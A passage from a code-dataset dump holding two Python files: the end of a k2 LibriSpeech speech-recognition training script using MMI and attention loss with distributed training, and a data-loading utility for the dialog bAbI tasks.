= 0.\n total_frames = 0. # for display only\n total_all_frames = 0. # all frames including those seqs that failed.\n\n model.eval()\n\n from torchaudio.datasets.utils import bg_iterator\n for batch_idx, batch in enumerate(bg_iterator(dataloader, 2)):\n objf, frames, all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=False,\n is_update=False,\n den_scale=den_scale,\n scaler=scaler\n )\n total_objf += objf\n total_frames += frames\n total_all_frames += all_frames\n\n return total_objf, total_frames, total_all_frames\n\n\ndef train_one_epoch(dataloader: torch.utils.data.DataLoader,\n valid_dataloader: torch.utils.data.DataLoader,\n model: AcousticModel,\n ali_model: Optional[AcousticModel],\n P: k2.Fsa,\n device: torch.device,\n graph_compiler: MmiTrainingGraphCompiler,\n use_pruned_intersect: bool,\n optimizer: torch.optim.Optimizer,\n accum_grad: int,\n den_scale: float,\n att_rate: float,\n current_epoch: int,\n tb_writer: SummaryWriter,\n num_epochs: int,\n global_batch_idx_train: int,\n world_size: int,\n scaler: GradScaler\n ):\n \"\"\"One epoch training and validation.\n\n Args:\n dataloader: Training dataloader\n valid_dataloader: Validation dataloader\n model: Acoustic model to be trained\n P: An FSA representing the bigram phone LM\n device: Training device, torch.device(\"cpu\") or torch.device(\"cuda\", device_id)\n graph_compiler: MMI training graph compiler\n optimizer: Training optimizer\n accum_grad: Number of gradient accumulation\n den_scale: Denominator scale in mmi loss\n att_rate: Attention loss rate, final loss is att_rate * att_loss + (1-att_rate) * other_loss\n current_epoch: current training epoch, for logging only\n tb_writer: tensorboard SummaryWriter\n num_epochs: total number of training epochs, for logging only\n global_batch_idx_train: global training batch index before this epoch, for logging only\n\n Returns:\n A tuple of 3 scalar: (total_objf / total_frames, valid_average_objf, global_batch_idx_train)\n - `total_objf / total_frames` is the average training loss\n - `valid_average_objf` is the average validation loss\n - `global_batch_idx_train` is the global training batch index after this epoch\n \"\"\"\n total_objf, total_frames, total_all_frames = 0., 0., 0.\n valid_average_objf = float('inf')\n time_waiting_for_batch = 0\n forward_count = 0\n prev_timestamp = datetime.now()\n\n model.train()\n for batch_idx, batch in enumerate(dataloader):\n forward_count += 1\n if forward_count == accum_grad:\n is_update = True\n forward_count = 0\n else:\n is_update = False\n\n global_batch_idx_train += 1\n timestamp = datetime.now()\n time_waiting_for_batch += (timestamp - prev_timestamp).total_seconds()\n\n if forward_count == 1 or accum_grad == 1:\n P.set_scores_stochastic_(model.module.P_scores)\n assert P.requires_grad is True\n\n curr_batch_objf, curr_batch_frames, curr_batch_all_frames = get_objf(\n batch=batch,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n is_training=True,\n is_update=is_update,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n tb_writer=tb_writer,\n global_batch_idx_train=global_batch_idx_train,\n optimizer=optimizer,\n scaler=scaler\n )\n\n total_objf += curr_batch_objf\n total_frames += curr_batch_frames\n total_all_frames += curr_batch_all_frames\n\n if batch_idx % 10 == 0:\n logging.info(\n 'batch {}, epoch {}/{} '\n 'global average objf: {:.6f} over {} '\n 'frames ({:.1f}% kept), current batch average objf: {:.6f} over {} frames ({:.1f}% kept) '\n 'avg time waiting for batch {:.3f}s'.format(\n batch_idx, current_epoch, num_epochs,\n total_objf / total_frames, total_frames,\n 100.0 * total_frames / total_all_frames,\n curr_batch_objf / (curr_batch_frames + 0.001),\n curr_batch_frames,\n 100.0 * curr_batch_frames / curr_batch_all_frames,\n time_waiting_for_batch / max(1, batch_idx)))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_average_objf',\n total_objf / total_frames, global_batch_idx_train)\n\n tb_writer.add_scalar('train/current_batch_average_objf',\n curr_batch_objf / (curr_batch_frames + 0.001),\n global_batch_idx_train)\n # if batch_idx >= 10:\n # print(\"Exiting early to get profile info\")\n # sys.exit(0)\n\n if batch_idx > 0 and batch_idx % 200 == 0:\n total_valid_objf, total_valid_frames, total_valid_all_frames = get_validation_objf(\n dataloader=valid_dataloader,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n scaler=scaler)\n if world_size > 1:\n s = torch.tensor([\n total_valid_objf, total_valid_frames,\n total_valid_all_frames\n ]).to(device)\n\n dist.all_reduce(s, op=dist.ReduceOp.SUM)\n total_valid_objf, total_valid_frames, total_valid_all_frames = s.cpu().tolist()\n\n valid_average_objf = total_valid_objf / total_valid_frames\n model.train()\n logging.info(\n 'Validation average objf: {:.6f} over {} frames ({:.1f}% kept)'\n .format(valid_average_objf,\n total_valid_frames,\n 100.0 * total_valid_frames / total_valid_all_frames))\n\n if tb_writer is not None:\n tb_writer.add_scalar('train/global_valid_average_objf',\n valid_average_objf,\n global_batch_idx_train)\n model.module.write_tensorboard_diagnostics(tb_writer, global_step=global_batch_idx_train)\n prev_timestamp = datetime.now()\n return total_objf / total_frames, valid_average_objf, global_batch_idx_train\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--world-size',\n type=int,\n default=1,\n help='Number of GPUs for DDP training.')\n parser.add_argument(\n '--master-port',\n type=int,\n default=12354,\n help='Master port to use for DDP training.')\n parser.add_argument(\n '--model-type',\n type=str,\n default=\"conformer\",\n choices=[\"transformer\", \"conformer\", \"contextnet\"],\n help=\"Model type.\")\n parser.add_argument(\n '--num-epochs',\n type=int,\n default=10,\n help=\"Number of training epochs.\")\n parser.add_argument(\n '--start-epoch',\n type=int,\n default=0,\n help=\"Number of start epoch.\")\n parser.add_argument(\n '--warm-step',\n type=int,\n default=5000,\n help='The number of warm-up steps for Noam optimizer.'\n )\n parser.add_argument(\n '--lr-factor',\n type=float,\n default=1.0,\n help='Learning rate factor for Noam optimizer.'\n )\n parser.add_argument(\n '--weight-decay',\n type=float,\n default=0.0,\n help='weight decay (L2 penalty) for Noam optimizer.'\n )\n parser.add_argument(\n '--accum-grad',\n type=int,\n default=1,\n help=\"Number of gradient accumulation.\")\n parser.add_argument(\n '--den-scale',\n type=float,\n default=1.0,\n help=\"denominator scale in mmi loss.\")\n parser.add_argument(\n '--att-rate',\n type=float,\n default=0.0,\n help=\"Attention loss rate.\")\n parser.add_argument(\n '--nhead',\n type=int,\n default=4,\n help=\"Number of attention heads in transformer.\")\n parser.add_argument(\n '--attention-dim',\n type=int,\n default=256,\n help=\"Number of units in transformer attention layers.\")\n parser.add_argument(\n '--tensorboard',\n type=str2bool,\n default=True,\n help='Should various information be logged in tensorboard.'\n )\n parser.add_argument(\n '--amp',\n type=str2bool,\n default=True,\n help='Should we use automatic mixed precision (AMP) training.'\n )\n parser.add_argument(\n '--use-ali-model',\n type=str2bool,\n default=True,\n help='If true, we assume that you have run ./ctc_train.py '\n 'and you have some checkpoints inside the directory '\n 'exp-lstm-adam-ctc-musan/ .'\n 'It will use exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt '\n 'as the pre-trained alignment model'\n )\n parser.add_argument(\n '--ali-model-epoch',\n type=int,\n default=7,\n help='If --use-ali-model is True, load '\n 'exp-lstm-adam-ctc-musan/epoch-{ali-model-epoch}.pt as the alignment model.'\n 'Used only if --use-ali-model is True.'\n )\n parser.add_argument(\n '--use-pruned-intersect',\n type=str2bool,\n default=False,\n help='True to use pruned intersect to compute the denominator lattice. ' \\\n 'You probably want to set it to True if you have a very large LM. ' \\\n 'In that case, you will get an OOM if it is False. ')\n # See https://github.com/k2-fsa/k2/issues/739 for more details\n parser.add_argument(\n '--torchscript',\n type=str2bool,\n default=False,\n help='Should we convert the model to TorchScript before starting training.'\n )\n parser.add_argument(\n '--torchscript-epoch',\n type=int,\n default=-1,\n help='After which epoch should we start storing models with TorchScript,'\n 'so that they can be simply loaded with torch.jit.load(). '\n '-1 disables this option.'\n )\n return parser\n\n\ndef run(rank, world_size, args):\n '''\n Args:\n rank:\n It is a value between 0 and `world_size-1`, which is\n passed automatically by `mp.spawn()` in :func:`main`.\n The node with rank 0 is responsible for saving checkpoint.\n world_size:\n Number of GPUs for DDP training.\n args:\n The return value of get_parser().parse_args()\n '''\n model_type = args.model_type\n start_epoch = args.start_epoch\n num_epochs = args.num_epochs\n accum_grad = args.accum_grad\n den_scale = args.den_scale\n att_rate = args.att_rate\n use_pruned_intersect = args.use_pruned_intersect\n\n fix_random_seed(42)\n setup_dist(rank, world_size, args.master_port)\n\n exp_dir = Path('exp-' + model_type + '-mmi-att-sa-vgg-normlayer')\n setup_logger(f'{exp_dir}/log/log-train-{rank}')\n if args.tensorboard and rank == 0:\n tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard')\n else:\n tb_writer = None\n # tb_writer = SummaryWriter(log_dir=f'{exp_dir}/tensorboard') if args.tensorboard and rank == 0 else None\n\n logging.info(\"Loading lexicon and symbol tables\")\n lang_dir = Path('data/lang_nosp')\n lexicon = Lexicon(lang_dir)\n\n device_id = rank\n device = torch.device('cuda', device_id)\n\n graph_compiler = MmiTrainingGraphCompiler(\n lexicon=lexicon,\n device=device,\n )\n phone_ids = lexicon.phone_symbols()\n P = create_bigram_phone_lm(phone_ids)\n P.scores = torch.zeros_like(P.scores)\n P = P.to(device)\n\n librispeech = LibriSpeechAsrDataModule(args)\n train_dl = librispeech.train_dataloaders()\n valid_dl = librispeech.valid_dataloaders()\n\n if not torch.cuda.is_available():\n logging.error('No GPU detected!')\n sys.exit(-1)\n\n if use_pruned_intersect:\n logging.info('Use pruned intersect for den_lats')\n else:\n logging.info(\"Don't use pruned intersect for den_lats\")\n\n logging.info(\"About to create model\")\n\n if att_rate != 0.0:\n num_decoder_layers = 6\n else:\n num_decoder_layers = 0\n\n if model_type == \"transformer\":\n model = Transformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True)\n elif model_type == \"conformer\":\n model = Conformer(\n num_features=80,\n nhead=args.nhead,\n d_model=args.attention_dim,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4,\n num_decoder_layers=num_decoder_layers,\n vgg_frontend=True,\n is_espnet_structure=True)\n elif model_type == \"contextnet\":\n model = ContextNet(\n num_features=80,\n num_classes=len(phone_ids) + 1) # +1 for the blank symbol\n else:\n raise NotImplementedError(\"Model of type \" + str(model_type) + \" is not implemented\")\n\n model.P_scores = nn.Parameter(P.scores.clone(), requires_grad=True)\n\n if args.torchscript:\n logging.info('Applying TorchScript to model...')\n model = torch.jit.script(model)\n\n model.to(device)\n describe(model)\n\n model = DDP(model, device_ids=[rank])\n\n # Now for the alignment model, if any\n if args.use_ali_model:\n ali_model = TdnnLstm1b(\n num_features=80,\n num_classes=len(phone_ids) + 1, # +1 for the blank symbol\n subsampling_factor=4)\n\n ali_model_fname = Path(f'exp-lstm-adam-ctc-musan/epoch-{args.ali_model_epoch}.pt')\n assert ali_model_fname.is_file(), \\\n f'ali model filename {ali_model_fname} does not exist!'\n ali_model.load_state_dict(torch.load(ali_model_fname, map_location='cpu')['state_dict'])\n ali_model.to(device)\n\n ali_model.eval()\n ali_model.requires_grad_(False)\n logging.info(f'Use ali_model: {ali_model_fname}')\n else:\n ali_model = None\n logging.info('No ali_model')\n\n optimizer = Noam(model.parameters(),\n model_size=args.attention_dim,\n factor=args.lr_factor,\n warm_step=args.warm_step,\n weight_decay=args.weight_decay)\n\n scaler = GradScaler(enabled=args.amp)\n\n best_objf = np.inf\n best_valid_objf = np.inf\n best_epoch = start_epoch\n best_model_path = os.path.join(exp_dir, 'best_model.pt')\n best_epoch_info_filename = os.path.join(exp_dir, 'best-epoch-info')\n global_batch_idx_train = 0 # for logging only\n\n if start_epoch > 0:\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(start_epoch - 1))\n ckpt = load_checkpoint(filename=model_path, model=model, optimizer=optimizer, scaler=scaler)\n best_objf = ckpt['objf']\n best_valid_objf = ckpt['valid_objf']\n global_batch_idx_train = ckpt['global_batch_idx_train']\n logging.info(f\"epoch = {ckpt['epoch']}, objf = {best_objf}, valid_objf = {best_valid_objf}\")\n\n for epoch in range(start_epoch, num_epochs):\n train_dl.sampler.set_epoch(epoch)\n curr_learning_rate = optimizer._rate\n if tb_writer is not None:\n tb_writer.add_scalar('train/learning_rate', curr_learning_rate, global_batch_idx_train)\n tb_writer.add_scalar('train/epoch', epoch, global_batch_idx_train)\n\n logging.info('epoch {}, learning rate {}'.format(epoch, curr_learning_rate))\n objf, valid_objf, global_batch_idx_train = train_one_epoch(\n dataloader=train_dl,\n valid_dataloader=valid_dl,\n model=model,\n ali_model=ali_model,\n P=P,\n device=device,\n graph_compiler=graph_compiler,\n use_pruned_intersect=use_pruned_intersect,\n optimizer=optimizer,\n accum_grad=accum_grad,\n den_scale=den_scale,\n att_rate=att_rate,\n current_epoch=epoch,\n tb_writer=tb_writer,\n num_epochs=num_epochs,\n global_batch_idx_train=global_batch_idx_train,\n world_size=world_size,\n scaler=scaler\n )\n # the lower, the better\n if valid_objf < best_valid_objf:\n best_valid_objf = valid_objf\n best_objf = objf\n best_epoch = epoch\n save_checkpoint(filename=best_model_path,\n optimizer=None,\n scheduler=None,\n scaler=None,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n save_training_info(filename=best_epoch_info_filename,\n model_path=best_model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n # we always save the model for every epoch\n model_path = os.path.join(exp_dir, 'epoch-{}.pt'.format(epoch))\n save_checkpoint(filename=model_path,\n optimizer=optimizer,\n scheduler=None,\n scaler=scaler,\n model=model,\n epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n valid_objf=valid_objf,\n global_batch_idx_train=global_batch_idx_train,\n local_rank=rank,\n torchscript=args.torchscript_epoch != -1 and epoch >= args.torchscript_epoch\n )\n epoch_info_filename = os.path.join(exp_dir, 'epoch-{}-info'.format(epoch))\n save_training_info(filename=epoch_info_filename,\n model_path=model_path,\n current_epoch=epoch,\n learning_rate=curr_learning_rate,\n objf=objf,\n best_objf=best_objf,\n valid_objf=valid_objf,\n best_valid_objf=best_valid_objf,\n best_epoch=best_epoch,\n local_rank=rank)\n\n logging.warning('Done')\n torch.distributed.barrier()\n cleanup_dist()\n\n\ndef main():\n parser = get_parser()\n LibriSpeechAsrDataModule.add_arguments(parser)\n args = parser.parse_args()\n world_size = args.world_size\n assert world_size >= 1\n mp.spawn(run, args=(world_size, args), nprocs=world_size, join=True)\n\n\ntorch.set_num_threads(1)\ntorch.set_num_interop_threads(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"egs/librispeech/asr/simple_v1/mmi_att_transformer_train.py","file_name":"mmi_att_transformer_train.py","file_ext":"py","file_size_in_byte":27443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"116037806","text":"import json\nimport torch\nimport torch.utils.data as data\nimport unicodedata\nimport string\nimport re\nimport random\nimport time\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\nfrom utils.config import *\nimport logging \nimport datetime\n\nclass Lang:\n def __init__(self):\n self.word2index = {}\n self.word2count = {}\n self.index2word = {UNK_token: 'UNK', PAD_token: \"PAD\", EOS_token: \"EOS\", SOS_token: \"SOS\"}\n self.n_words = 4 # Count default tokens\n \n def index_words(self, sentence):\n for word in sentence.split(' '):\n self.index_word(word)\n\n def index_word(self, word):\n if word not in self.word2index:\n self.word2index[word] = self.n_words\n self.word2count[word] = 1\n self.index2word[self.n_words] = word\n self.n_words += 1\n else:\n self.word2count[word] += 1\n\n\nclass Dataset(data.Dataset):\n \"\"\"Custom data.Dataset compatible with data.DataLoader.\"\"\"\n def __init__(self, src_seq, trg_seq, index_seq, gate_seq,src_word2id, trg_word2id,max_len):\n \"\"\"Reads source and target sequences from txt files.\"\"\"\n self.src_seqs = src_seq\n self.trg_seqs = trg_seq\n self.index_seqs = index_seq \n self.gate_seq = gate_seq \n self.num_total_seqs = len(self.src_seqs)\n self.src_word2id = src_word2id\n self.trg_word2id = trg_word2id\n self.max_len = max_len\n\n def __getitem__(self, index):\n \"\"\"Returns one data pair (source and target).\"\"\"\n src_seq = self.src_seqs[index]\n trg_seq = self.trg_seqs[index]\n index_s = self.index_seqs[index]\n gete_s = self.gate_seq[index]\n src_seq = self.preprocess(src_seq, self.src_word2id, trg=False)\n trg_seq = self.preprocess(trg_seq, self.trg_word2id)\n index_s = self.preprocess_inde(index_s,src_seq)\n gete_s = self.preprocess_gate(gete_s)\n \n return src_seq, trg_seq, index_s, gete_s,self.max_len,self.src_seqs[index],self.trg_seqs[index]\n\n def __len__(self):\n return self.num_total_seqs\n \n def preprocess(self, sequence, word2id, trg=True):\n \"\"\"Converts words to ids.\"\"\"\n if(trg):\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]+ [EOS_token]\n sequence = torch.Tensor(sequence)\n else:\n sequence = [word2id[word] if word in word2id else UNK_token for word in sequence.split(' ')]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_inde(self, sequence,src_seq):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [len(src_seq)-1]\n sequence = torch.Tensor(sequence)\n return sequence\n\n def preprocess_gate(self, sequence):\n \"\"\"Converts words to ids.\"\"\"\n sequence = sequence + [0]\n sequence = torch.Tensor(sequence)\n return sequence\n\ndef collate_fn(data):\n def merge(sequences,max_len):\n lengths = [len(seq) for seq in sequences]\n if (max_len):\n padded_seqs = torch.ones(len(sequences), max_len[0]).long()\n else:\n padded_seqs = torch.ones(len(sequences), max(lengths)).long()\n for i, seq in enumerate(sequences):\n end = lengths[i]\n padded_seqs[i, :end] = seq[:end]\n return padded_seqs, lengths\n\n # sort a list by sequence length (descending order) to use pack_padded_sequence\n data.sort(key=lambda x: len(x[0]), reverse=True)\n # seperate source and target sequences\n src_seqs, trg_seqs, ind_seqs, gete_s, max_len, src_plain,trg_plain = zip(*data)\n # merge sequences (from tuple of 1D tensor to 2D tensor)\n src_seqs, src_lengths = merge(src_seqs,max_len)\n trg_seqs, trg_lengths = merge(trg_seqs,None)\n ind_seqs, _ = merge(ind_seqs,None)\n gete_s, _ = merge(gete_s,None)\n \n src_seqs = Variable(src_seqs).transpose(0,1)\n trg_seqs = Variable(trg_seqs).transpose(0,1)\n ind_seqs = Variable(ind_seqs).transpose(0,1)\n gete_s = Variable(gete_s).transpose(0,1)\n if USE_CUDA:\n src_seqs = src_seqs.cuda()\n trg_seqs = trg_seqs.cuda()\n ind_seqs = ind_seqs.cuda()\n gete_s = gete_s.cuda()\n return src_seqs, src_lengths, trg_seqs, trg_lengths, ind_seqs, gete_s, src_plain, trg_plain\n\n\ndef read_langs(file_name, max_line = None):\n logging.info((\"Reading lines from {}\".format(file_name)))\n # Read the file and split into lines\n data=[]\n context=\"\"\n u=None\n r=None\n with open(file_name) as fin:\n cnt_ptr = 0\n cnt_voc = 0\n max_r_len = 0\n cnt_lin = 1\n for line in fin:\n line=line.strip()\n if line:\n nid, line = line.split(' ', 1)\n if '\\t' in line:\n u, r = line.split('\\t')\n context += str(u)+\" \" \n contex_arr = context.split(' ')[LIMIT:]\n r_index = []\n gate = []\n for key in r.split(' '):\n index = [loc for loc, val in enumerate(contex_arr) if val == key]\n if (index):\n index = max(index)\n gate.append(1)\n cnt_ptr +=1\n else: \n index = len(contex_arr) - 1 \n gate.append(0) \n cnt_voc +=1 \n r_index.append(index)\n\n if len(r_index) > max_r_len: \n max_r_len = len(r_index)\n data.append([\" \".join(contex_arr)+\"$$$$\",r,r_index,gate])\n context+=str(r)+\" \" \n else:\n r=line\n if USEKB:\n context+=str(r)+\" \" \n else:\n cnt_lin+=1\n if(max_line and cnt_lin>=max_line):\n break\n context=\"\"\n max_len = max([len(d[0].split(' ')) for d in data])\n avg_len = sum([len(d[0].split(' ')) for d in data]) / float(len([len(d[0].split(' ')) for d in data]))\n logging.info(\"Pointer percentace= {} \".format(cnt_ptr/(cnt_ptr+cnt_voc)))\n logging.info(\"Max responce Len: {}\".format(max_r_len))\n logging.info(\"Max Input Len: {}\".format(max_len))\n logging.info(\"AVG Input Len: {}\".format(avg_len))\n return data, max_len, max_r_len\n\n\ndef get_seq(pairs,lang,batch_size,type,max_len): \n x_seq = []\n y_seq = []\n ptr_seq = []\n gate_seq = []\n for pair in pairs:\n x_seq.append(pair[0])\n y_seq.append(pair[1])\n ptr_seq.append(pair[2])\n gate_seq.append(pair[3])\n if(type):\n lang.index_words(pair[0])\n lang.index_words(pair[1])\n \n dataset = Dataset(x_seq, y_seq,ptr_seq,gate_seq,lang.word2index, lang.word2index,max_len)\n data_loader = torch.utils.data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=type,\n collate_fn=collate_fn)\n return data_loader\n\ndef prepare_data_seq(task,batch_size=100,shuffle=True):\n file_train = 'data/dialog-bAbI-tasks/dialog-babi-task{}trn.txt'.format(task)\n file_dev = 'data/dialog-bAbI-tasks/dialog-babi-task{}dev.txt'.format(task)\n file_test = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst.txt'.format(task)\n if (int(task) != 6):\n file_test_OOV = 'data/dialog-bAbI-tasks/dialog-babi-task{}tst-OOV.txt'.format(task)\n pair_train,max_len_train, max_r_train = read_langs(file_train, max_line=None)\n pair_dev,max_len_dev, max_r_dev = read_langs(file_dev, max_line=None)\n pair_test,max_len_test, max_r_test = read_langs(file_test, max_line=None)\n max_r_test_OOV = 0\n max_len_test_OOV = 0\n if (int(task) != 6):\n pair_test_OOV,max_len_test_OOV, max_r_test_OOV = read_langs(file_test_OOV, max_line=None)\n \n max_len = max(max_len_train,max_len_dev,max_len_test,max_len_test_OOV) +1\n max_r = max(max_r_train,max_r_dev,max_r_test,max_r_test_OOV) +1\n lang = Lang()\n \n train = get_seq(pair_train,lang,batch_size,True,max_len)\n dev = get_seq(pair_dev,lang,batch_size,False,max_len)\n test = get_seq(pair_test,lang,batch_size,False,max_len)\n if (int(task) != 6):\n testOOV = get_seq(pair_test_OOV,lang,batch_size,False,max_len)\n else:\n testOOV = []\n \n \n logging.info(\"Read %s sentence pairs train\" % len(pair_train))\n logging.info(\"Read %s sentence pairs dev\" % len(pair_dev))\n logging.info(\"Read %s sentence pairs test\" % len(pair_test))\n if (int(task) != 6):\n logging.info(\"Read %s sentence pairs test\" % len(pair_test_OOV)) \n logging.info(\"Max len Input %s \" % max_len)\n logging.info(\"Vocab_size %s \" % lang.n_words)\n logging.info(\"USE_CUDA={}\".format(USE_CUDA))\n \n return train, dev, test, testOOV, lang, max_len, max_r\n\n","sub_path":"utils/utils_babi.py","file_name":"utils_babi.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}